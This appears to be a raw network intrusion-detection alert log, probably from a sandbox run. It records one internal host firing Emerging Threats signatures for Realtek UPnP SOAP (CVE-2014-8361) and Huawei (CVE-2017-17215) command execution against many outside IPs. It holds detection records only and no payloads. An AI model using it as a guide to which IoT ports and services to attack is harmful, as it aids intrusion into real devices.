                                                07/20/24-23:05:59.239089TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614644252869192.168.2.14168.45.23.98
                                                07/20/24-23:06:20.738854TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3558452869192.168.2.14162.62.228.182
                                                07/20/24-23:05:46.175472TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613410452869192.168.2.14211.43.222.47
                                                07/20/24-23:07:06.714084TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25499252869192.168.2.1483.207.51.198
                                                07/20/24-23:05:38.953817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5691037215192.168.2.14150.200.98.83
                                                07/20/24-23:05:42.221844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4536837215192.168.2.14157.68.206.93
                                                07/20/24-23:05:44.346058TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615085252869192.168.2.1448.41.41.245
                                                07/20/24-23:05:40.342827TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3436652869192.168.2.1431.209.91.245
                                                07/20/24-23:05:59.303078TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4287852869192.168.2.14148.3.120.99
                                                07/20/24-23:06:00.971446TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615795052869192.168.2.14133.98.16.57
                                                07/20/24-23:06:09.320815TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24237252869192.168.2.14184.132.87.238
                                                07/20/24-23:06:12.572216TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5214452869192.168.2.14170.223.132.126
                                                07/20/24-23:05:50.533759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4151037215192.168.2.14157.221.168.58
                                                07/20/24-23:05:58.855356TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24231252869192.168.2.1419.228.35.122
                                                07/20/24-23:06:01.913378TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25910052869192.168.2.1431.110.108.63
                                                07/20/24-23:05:58.004179TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3731452869192.168.2.14107.90.243.251
                                                07/20/24-23:06:02.508899TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615071852869192.168.2.14189.26.184.105
                                                07/20/24-23:05:56.038244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5688037215192.168.2.14181.18.68.226
                                                07/20/24-23:05:46.113321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5839037215192.168.2.14197.133.63.148
                                                07/20/24-23:05:56.285994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3897837215192.168.2.14197.48.27.151
                                                07/20/24-23:05:50.528919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4135437215192.168.2.14175.45.215.161
                                                07/20/24-23:05:57.916554TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615316652869192.168.2.14124.138.24.130
                                                07/20/24-23:05:46.117104TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614557452869192.168.2.14207.210.54.245
                                                07/20/24-23:06:03.841638TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25769652869192.168.2.14145.15.157.98
                                                07/20/24-23:05:36.325773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4221437215192.168.2.1449.254.13.12
                                                07/20/24-23:06:24.734892TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5353252869192.168.2.14185.5.149.16
                                                07/20/24-23:06:16.084912TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4319052869192.168.2.14145.163.35.151
                                                07/20/24-23:05:34.664378TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3897237215192.168.2.1444.66.223.184
                                                07/20/24-23:05:39.065904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5098837215192.168.2.1441.23.219.80
                                                07/20/24-23:05:58.102253TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5080652869192.168.2.1469.41.19.44
                                                07/20/24-23:05:46.088778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5508637215192.168.2.14197.24.233.5
                                                07/20/24-23:06:45.315463TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613488252869192.168.2.14156.106.217.64
                                                07/20/24-23:05:40.458812TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25711252869192.168.2.1434.80.28.184
                                                07/20/24-23:06:24.491533TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23937452869192.168.2.14149.180.184.56
                                                07/20/24-23:05:46.706860TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613532452869192.168.2.14210.13.132.2
                                                07/20/24-23:05:42.221844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4578837215192.168.2.14197.80.221.166
                                                07/20/24-23:05:47.433337TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5383852869192.168.2.1454.172.8.61
                                                07/20/24-23:05:59.324002TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4910852869192.168.2.14163.92.171.162
                                                07/20/24-23:06:02.167111TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613766652869192.168.2.14151.153.74.124
                                                07/20/24-23:06:31.001861TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5091852869192.168.2.1437.178.53.0
                                                07/20/24-23:05:59.251571TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23525252869192.168.2.1413.165.183.213
                                                07/20/24-23:05:38.944157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3906437215192.168.2.1441.52.38.231
                                                07/20/24-23:05:39.176981TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4028852869192.168.2.14164.63.211.187
                                                07/20/24-23:05:40.423413TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6026052869192.168.2.14128.15.34.80
                                                07/20/24-23:06:14.686896TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614643452869192.168.2.14190.92.200.248
                                                07/20/24-23:05:59.057513TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23662852869192.168.2.1489.202.192.181
                                                07/20/24-23:05:35.277107TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5609652869192.168.2.144.162.121.105
                                                07/20/24-23:05:40.461168TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25105652869192.168.2.14157.171.149.72
                                                07/20/24-23:06:00.677656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3615437215192.168.2.14197.158.173.181
                                                07/20/24-23:06:10.453658TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25319252869192.168.2.14126.244.253.92
                                                07/20/24-23:05:33.859779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5658237215192.168.2.14157.14.174.37
                                                07/20/24-23:06:08.543985TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5579652869192.168.2.1427.3.122.168
                                                07/20/24-23:07:47.118980TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24338852869192.168.2.1438.245.190.228
                                                07/20/24-23:06:35.260557TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615003852869192.168.2.14207.136.193.67
                                                07/20/24-23:05:52.515827TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25129252869192.168.2.14189.17.62.143
                                                07/20/24-23:05:58.983376TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5330452869192.168.2.1473.169.3.41
                                                07/20/24-23:05:59.464785TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614029252869192.168.2.14169.222.175.35
                                                07/20/24-23:05:48.788274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4694237215192.168.2.14197.16.194.126
                                                07/20/24-23:06:02.085078TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615717252869192.168.2.14202.241.41.21
                                                07/20/24-23:05:48.278742TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614364652869192.168.2.1413.6.44.150
                                                07/20/24-23:05:57.861533TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4953852869192.168.2.14151.20.36.90
                                                07/20/24-23:05:40.331312TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25797052869192.168.2.1497.189.105.6
                                                07/20/24-23:06:01.170266TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26092852869192.168.2.14130.216.114.2
                                                07/20/24-23:05:40.444876TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5779252869192.168.2.145.238.81.248
                                                07/20/24-23:05:56.632782TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616002252869192.168.2.14146.82.123.202
                                                07/20/24-23:06:01.986039TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5853452869192.168.2.14201.146.209.197
                                                07/20/24-23:06:06.231390TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613352652869192.168.2.14158.195.194.180
                                                07/20/24-23:06:16.328595TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26011652869192.168.2.14132.53.183.184
                                                07/20/24-23:05:57.179441TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23304652869192.168.2.14114.99.252.59
                                                07/20/24-23:06:50.079146TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615661252869192.168.2.1453.30.203.133
                                                07/20/24-23:05:59.171136TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25769252869192.168.2.1468.208.168.253
                                                07/20/24-23:06:01.219202TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3591652869192.168.2.14114.97.238.55
                                                07/20/24-23:05:57.651872TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4511252869192.168.2.14120.75.230.210
                                                07/20/24-23:06:12.623995TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614677852869192.168.2.1459.97.251.204
                                                07/20/24-23:05:36.338927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4325237215192.168.2.14157.173.188.51
                                                07/20/24-23:06:01.625834TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23706852869192.168.2.14110.73.58.137
                                                07/20/24-23:05:37.542495TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3631252869192.168.2.14114.179.104.124
                                                07/20/24-23:05:40.348098TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4536452869192.168.2.1440.98.198.13
                                                07/20/24-23:05:52.607039TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4870252869192.168.2.14213.18.175.220
                                                07/20/24-23:05:56.424977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5847437215192.168.2.14202.58.65.35
                                                07/20/24-23:05:57.913786TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25722252869192.168.2.14128.239.71.215
                                                07/20/24-23:06:00.177522TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6023052869192.168.2.14223.141.195.26
                                                07/20/24-23:05:37.453720TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23729852869192.168.2.14162.12.166.249
                                                07/20/24-23:05:34.662485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5357837215192.168.2.14197.101.55.74
                                                07/20/24-23:07:37.315997TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615955052869192.168.2.14186.145.2.207
                                                07/20/24-23:05:47.120793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5367637215192.168.2.14197.108.149.161
                                                07/20/24-23:06:13.793654TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5694852869192.168.2.14184.13.80.10
                                                07/20/24-23:06:03.679529TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25602652869192.168.2.14182.27.195.239
                                                07/20/24-23:05:56.402930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3903037215192.168.2.14197.144.119.68
                                                07/20/24-23:07:01.438133TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3785052869192.168.2.14147.32.157.174
                                                07/20/24-23:06:24.317926TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3852452869192.168.2.14149.180.184.56
                                                07/20/24-23:05:59.316014TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615618852869192.168.2.14180.7.73.104
                                                07/20/24-23:06:05.309801TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23645052869192.168.2.1412.220.195.141
                                                07/20/24-23:05:59.727506TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5227252869192.168.2.1442.150.243.146
                                                07/20/24-23:05:33.859349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4316437215192.168.2.1441.93.186.26
                                                07/20/24-23:06:11.236923TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3649652869192.168.2.1480.173.4.192
                                                07/20/24-23:06:51.240850TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613552452869192.168.2.14120.112.236.136
                                                07/20/24-23:06:01.896425TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5398252869192.168.2.1499.117.47.20
                                                07/20/24-23:06:37.456862TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613981852869192.168.2.1445.140.203.53
                                                07/20/24-23:05:48.756259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5781637215192.168.2.14197.105.120.116
                                                07/20/24-23:06:13.512424TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3824052869192.168.2.14161.79.108.3
                                                07/20/24-23:06:01.214826TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24825252869192.168.2.14105.123.4.149
                                                07/20/24-23:05:56.953935TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615407852869192.168.2.14196.217.33.59
                                                07/20/24-23:05:50.498027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5507637215192.168.2.1441.206.197.130
                                                07/20/24-23:06:56.793781TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24761852869192.168.2.1492.24.43.126
                                                07/20/24-23:05:38.538181TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613951252869192.168.2.1449.30.236.251
                                                07/20/24-23:06:06.855214TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5287252869192.168.2.1418.214.245.19
                                                07/20/24-23:06:01.829267TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25907852869192.168.2.1463.83.58.182
                                                07/20/24-23:05:52.535101TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3495852869192.168.2.1498.101.208.247
                                                07/20/24-23:06:00.153687TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615444652869192.168.2.14103.198.111.177
                                                07/20/24-23:05:59.453008TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3557452869192.168.2.14194.174.131.9
                                                07/20/24-23:06:56.793781TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25712252869192.168.2.14149.133.154.242
                                                07/20/24-23:05:35.579965TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613730052869192.168.2.1468.85.217.10
                                                07/20/24-23:06:01.763636TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23541852869192.168.2.1459.29.225.212
                                                07/20/24-23:05:37.445623TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24150452869192.168.2.14200.51.205.131
                                                07/20/24-23:05:58.716925TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4772452869192.168.2.1438.249.4.4
                                                07/20/24-23:05:42.176965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3552637215192.168.2.14124.123.46.136
                                                07/20/24-23:06:02.953100TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614066052869192.168.2.14193.28.16.55
                                                07/20/24-23:05:52.527430TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5295652869192.168.2.14122.228.47.35
                                                07/20/24-23:06:01.535181TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615033852869192.168.2.14204.45.41.209
                                                07/20/24-23:05:45.805358TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5623452869192.168.2.1420.184.51.228
                                                07/20/24-23:06:17.539924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6024837215192.168.2.14197.7.68.217
                                                07/20/24-23:06:00.147952TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5730452869192.168.2.14163.142.81.29
                                                07/20/24-23:06:00.426771TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3842252869192.168.2.14123.128.247.166
                                                07/20/24-23:05:56.705397TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615689852869192.168.2.1437.27.29.149
                                                07/20/24-23:05:39.809666TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615867052869192.168.2.14205.187.149.67
                                                07/20/24-23:05:40.468265TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24168852869192.168.2.14164.63.211.187
                                                07/20/24-23:06:17.863423TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3527252869192.168.2.14216.40.228.188
                                                07/20/24-23:05:42.245742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3889437215192.168.2.14157.194.169.49
                                                07/20/24-23:05:56.022964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6015637215192.168.2.1441.163.78.59
                                                07/20/24-23:06:02.512491TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25294052869192.168.2.1420.92.79.193
                                                07/20/24-23:05:56.214861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5878637215192.168.2.1441.49.210.9
                                                07/20/24-23:05:34.656192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4246237215192.168.2.14197.86.55.32
                                                07/20/24-23:05:37.542288TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23583252869192.168.2.14172.126.0.115
                                                07/20/24-23:05:37.979608TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3663652869192.168.2.1449.83.27.219
                                                07/20/24-23:06:13.676865TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23638052869192.168.2.14114.59.223.176
                                                07/20/24-23:05:57.538013TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3382452869192.168.2.14211.48.36.13
                                                07/20/24-23:05:36.323648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5259237215192.168.2.14157.227.154.63
                                                07/20/24-23:06:06.153640TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613306052869192.168.2.1437.17.64.36
                                                07/20/24-23:06:07.419849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4916837215192.168.2.14197.218.36.212
                                                07/20/24-23:05:45.468009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5029037215192.168.2.14113.180.21.101
                                                07/20/24-23:05:40.486123TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5996452869192.168.2.1432.251.164.213
                                                07/20/24-23:06:02.182231TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4420252869192.168.2.14136.117.105.142
                                                07/20/24-23:05:40.471777TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23542252869192.168.2.1495.244.78.147
                                                07/20/24-23:05:37.456840TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24178252869192.168.2.1491.48.213.35
                                                07/20/24-23:05:40.344189TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5053052869192.168.2.1491.121.169.191
                                                07/20/24-23:05:39.672304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6076237215192.168.2.1441.17.116.139
                                                07/20/24-23:06:16.287042TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4974052869192.168.2.1498.16.115.167
                                                07/20/24-23:06:35.384402TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23676852869192.168.2.14117.127.16.156
                                                07/20/24-23:05:37.493636TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5298652869192.168.2.14205.35.169.26
                                                07/20/24-23:06:20.736535TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613936852869192.168.2.1497.10.65.178
                                                07/20/24-23:06:17.635185TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4324652869192.168.2.14154.119.243.101
                                                07/20/24-23:05:40.377377TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4171852869192.168.2.14141.149.116.120
                                                07/20/24-23:05:57.143736TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3394252869192.168.2.14180.234.239.68
                                                07/20/24-23:05:52.633204TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25060452869192.168.2.14164.86.63.183
                                                07/20/24-23:05:59.382234TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5153652869192.168.2.14147.234.87.243
                                                07/20/24-23:05:59.565815TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3731452869192.168.2.1497.170.235.212
                                                07/20/24-23:06:08.296284TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4157652869192.168.2.1497.93.62.217
                                                07/20/24-23:05:56.022964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5244837215192.168.2.1441.112.178.181
                                                07/20/24-23:05:52.483885TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23587452869192.168.2.14141.254.197.56
                                                07/20/24-23:05:55.877930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3884637215192.168.2.14197.203.124.67
                                                07/20/24-23:06:00.572173TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25939052869192.168.2.14221.88.192.249
                                                07/20/24-23:06:53.637724TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5985452869192.168.2.14140.253.53.98
                                                07/20/24-23:05:47.333295TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613295252869192.168.2.1417.203.0.123
                                                07/20/24-23:06:18.501276TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614226852869192.168.2.1438.62.197.212
                                                07/20/24-23:06:02.251198TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24001252869192.168.2.14182.199.230.99
                                                07/20/24-23:06:03.216294TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25225852869192.168.2.14175.129.157.75
                                                07/20/24-23:06:11.978005TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5676452869192.168.2.1434.74.79.94
                                                07/20/24-23:05:35.226653TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614979852869192.168.2.14204.66.149.99
                                                07/20/24-23:05:47.218209TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5643452869192.168.2.14120.12.145.48
                                                07/20/24-23:05:50.533759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5501437215192.168.2.14176.107.182.178
                                                07/20/24-23:05:57.947146TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615006652869192.168.2.1420.69.99.207
                                                07/20/24-23:06:01.374971TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24183052869192.168.2.1418.174.57.38
                                                07/20/24-23:05:34.652423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4751037215192.168.2.1434.202.46.128
                                                07/20/24-23:05:46.113321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5488037215192.168.2.14197.54.128.95
                                                07/20/24-23:05:56.159948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131237215192.168.2.14189.18.49.177
                                                07/20/24-23:06:31.457622TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615507652869192.168.2.14167.193.31.8
                                                07/20/24-23:05:58.983376TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24133452869192.168.2.1462.67.165.78
